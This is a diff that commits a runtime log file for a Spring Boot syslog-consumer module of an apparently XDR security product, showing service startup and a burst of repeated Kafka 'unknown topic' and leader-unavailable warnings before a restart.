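1. Added features: probe-linked response handling and heartbeat online detection.
2. Split the syslog-consumer module; the syslog-consumer-rule module implements log data consumption, parsing, and normalization into storage.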
@@ -0,0 +1,251 @@
|
||||
2026-05-19 11:53:04.687 [background-preinit] INFO o.h.validator.internal.util.Version - HV000001: Hibernate Validator 6.2.5.Final
|
||||
2026-05-19 11:53:04.687 [main] INFO com.syslogRuleApplication - Starting syslogRuleApplication using Java 1.8.0_121 on LAPTOP-ARDUR3N0 with PID 22112 (E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr\syslog-consumer-rule\target\classes started by chenc in E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr)
|
||||
2026-05-19 11:53:04.724 [main] INFO com.syslogRuleApplication - No active profile set, falling back to 1 default profile: "default"
|
||||
2026-05-19 11:53:07.286 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
|
||||
2026-05-19 11:53:07.288 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Elasticsearch repositories in DEFAULT mode.
|
||||
2026-05-19 11:53:07.872 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 578 ms. Found 1 Elasticsearch repository interfaces.
|
||||
2026-05-19 11:53:07.878 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
|
||||
2026-05-19 11:53:07.879 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Reactive Elasticsearch repositories in DEFAULT mode.
|
||||
2026-05-19 11:53:07.983 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Reactive Elasticsearch - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Reactive Elasticsearch repository, consider annotating your entities with one of these annotations: org.springframework.data.elasticsearch.annotations.Document (preferred), or consider extending one of the following types with your repository: org.springframework.data.elasticsearch.repository.ReactiveElasticsearchRepository
|
||||
2026-05-19 11:53:07.983 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 103 ms. Found 0 Reactive Elasticsearch repository interfaces.
|
||||
2026-05-19 11:53:07.994 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
|
||||
2026-05-19 11:53:07.995 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Redis repositories in DEFAULT mode.
|
||||
2026-05-19 11:53:08.138 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Redis - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Redis repository, consider annotating your entities with one of these annotations: org.springframework.data.redis.core.RedisHash (preferred), or consider extending one of the following types with your repository: org.springframework.data.keyvalue.repository.KeyValueRepository
|
||||
2026-05-19 11:53:08.139 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 137 ms. Found 0 Redis repository interfaces.
|
||||
2026-05-19 11:53:08.884 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat initialized with port(s): 8289 (http)
|
||||
2026-05-19 11:53:08.893 [main] INFO o.a.coyote.http11.Http11NioProtocol - Initializing ProtocolHandler ["http-nio-8289"]
|
||||
2026-05-19 11:53:08.894 [main] INFO o.a.catalina.core.StandardService - Starting service [Tomcat]
|
||||
2026-05-19 11:53:08.894 [main] INFO o.a.catalina.core.StandardEngine - Starting Servlet engine: [Apache Tomcat/9.0.65]
|
||||
2026-05-19 11:53:09.084 [main] INFO o.a.c.c.C.[.[localhost].[/xdrrule] - Initializing Spring embedded WebApplicationContext
|
||||
2026-05-19 11:53:09.085 [main] INFO o.s.b.w.s.c.ServletWebServerApplicationContext - Root WebApplicationContext: initialization completed in 4203 ms
|
||||
2026-05-19 11:53:09.143 [main] INFO o.s.b.f.a.AutowiredAnnotationBeanPostProcessor - Autowired annotation is not supported on static fields: private static com.common.service.DmColumnService com.syslogRuleApplication.dmColumnService
|
||||
2026-05-19 11:53:11.848 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
|
||||
2026-05-19 11:53:12.270 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.insert] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Insert]
|
||||
2026-05-19 11:53:12.284 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.update] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Update]
|
||||
2026-05-19 11:53:12.302 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.deleteById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.DeleteById]
|
||||
2026-05-19 11:53:12.305 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.selectById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.SelectById]
|
||||
2026-05-19 11:53:12.364 [main] ERROR c.b.m.core.MybatisConfiguration - mapper[com.common.mapper.SecExceptionAlgorithmMapper.findById] is ignored, because it exists, maybe from xml file
|
||||
2026-05-19 11:53:18.245 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
|
||||
2026-05-19 11:53:18.977 [main] INFO com.common.util.MyBatisUtil - MyBatis 初始化成功
|
||||
2026-05-19 11:53:19.627 [main] INFO org.quartz.impl.StdSchedulerFactory - Using default implementation for ThreadExecutor
|
||||
2026-05-19 11:53:19.636 [main] INFO o.quartz.core.SchedulerSignalerImpl - Initialized Scheduler Signaller of type: class org.quartz.core.SchedulerSignalerImpl
|
||||
2026-05-19 11:53:19.637 [main] INFO org.quartz.core.QuartzScheduler - Quartz Scheduler v.2.3.2 created.
|
||||
2026-05-19 11:53:19.637 [main] INFO org.quartz.simpl.RAMJobStore - RAMJobStore initialized.
|
||||
2026-05-19 11:53:19.638 [main] INFO org.quartz.core.QuartzScheduler - Scheduler meta-data: Quartz Scheduler (v2.3.2) 'quartzScheduler' with instanceId 'NON_CLUSTERED'
|
||||
Scheduler class: 'org.quartz.core.QuartzScheduler' - running locally.
|
||||
NOT STARTED.
|
||||
Currently in standby mode.
|
||||
Number of jobs executed: 0
|
||||
Using thread pool 'org.quartz.simpl.SimpleThreadPool' - with 10 threads.
|
||||
Using job-store 'org.quartz.simpl.RAMJobStore' - which does not support persistence. and is not clustered.
|
||||
|
||||
2026-05-19 11:53:19.638 [main] INFO org.quartz.impl.StdSchedulerFactory - Quartz scheduler 'quartzScheduler' initialized from an externally provided properties instance.
|
||||
2026-05-19 11:53:19.638 [main] INFO org.quartz.impl.StdSchedulerFactory - Quartz scheduler version: 2.3.2
|
||||
2026-05-19 11:53:19.638 [main] INFO org.quartz.core.QuartzScheduler - JobFactory set to: org.springframework.scheduling.quartz.SpringBeanJobFactory@3b68a50c
|
||||
2026-05-19 11:53:19.847 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka version: 3.4.0
|
||||
2026-05-19 11:53:19.847 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka commitId: 2e1947d240607d53
|
||||
2026-05-19 11:53:19.847 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka startTimeMs: 1779162799845
|
||||
2026-05-19 11:53:19.873 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka version: 3.4.0
|
||||
2026-05-19 11:53:19.873 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka commitId: 2e1947d240607d53
|
||||
2026-05-19 11:53:19.873 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka startTimeMs: 1779162799873
|
||||
2026-05-19 11:53:19.875 [main] INFO o.a.coyote.http11.Http11NioProtocol - Starting ProtocolHandler ["http-nio-8289"]
|
||||
2026-05-19 11:53:19.892 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat started on port(s): 8289 (http) with context path '/xdrrule'
|
||||
2026-05-19 11:53:19.892 [main] INFO o.s.s.quartz.SchedulerFactoryBean - Starting Quartz Scheduler now
|
||||
2026-05-19 11:53:19.893 [main] INFO org.quartz.core.QuartzScheduler - Scheduler quartzScheduler_$_NON_CLUSTERED started.
|
||||
2026-05-19 11:53:19.911 [main] INFO com.syslogRuleApplication - Started syslogRuleApplication in 16.279 seconds (JVM running for 21.466)
|
||||
2026-05-19 11:53:20.209 [org.springframework.kafka.KafkaListenerEndpointContainer#0-1-C-1] INFO o.s.k.l.KafkaMessageListenerContainer - agent-syslog-group: partitions assigned: []
|
||||
2026-05-19 11:53:20.276 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] INFO o.s.k.l.KafkaMessageListenerContainer - agent-syslog-group: partitions assigned: [agent-syslog-topic-0]
|
||||
2026-05-19 12:38:15.007 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.014 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.apache.kafka.clients.NetworkClient - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Error while fetching metadata with correlation id 2912 : {agent-syslog-topic=LEADER_NOT_AVAILABLE}
|
||||
2026-05-19 12:38:15.015 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.019 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.021 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.022 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.024 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.025 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.028 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.030 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.035 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.040 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.044 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.047 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.050 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.051 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.055 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.057 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.060 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.065 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.068 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.071 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.073 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.075 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.080 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.082 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.083 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.085 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.086 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.088 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.089 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.090 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.092 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.096 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.100 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.101 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.103 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.105 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.107 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.109 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.110 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.112 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.114 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.136 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.apache.kafka.clients.NetworkClient - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Error while fetching metadata with correlation id 2954 : {agent-syslog-topic=LEADER_NOT_AVAILABLE}
|
||||
2026-05-19 12:38:15.136 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.147 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.157 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.162 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.165 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.168 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.169 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.172 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.176 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.178 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.179 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.181 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.183 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.185 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.189 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.191 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.194 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.196 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.198 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.200 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.205 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.207 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.208 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.211 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:40:49.569 [main] INFO com.syslogRuleApplication - Starting syslogRuleApplication using Java 1.8.0_121 on LAPTOP-ARDUR3N0 with PID 30764 (E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr\syslog-consumer-rule\target\classes started by chenc in E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr)
|
||||
2026-05-19 12:40:49.570 [background-preinit] INFO o.h.validator.internal.util.Version - HV000001: Hibernate Validator 6.2.5.Final
|
||||
2026-05-19 12:40:49.574 [main] INFO com.syslogRuleApplication - No active profile set, falling back to 1 default profile: "default"
|
||||
2026-05-19 12:40:51.867 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
|
||||
2026-05-19 12:40:51.869 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Elasticsearch repositories in DEFAULT mode.
|
||||
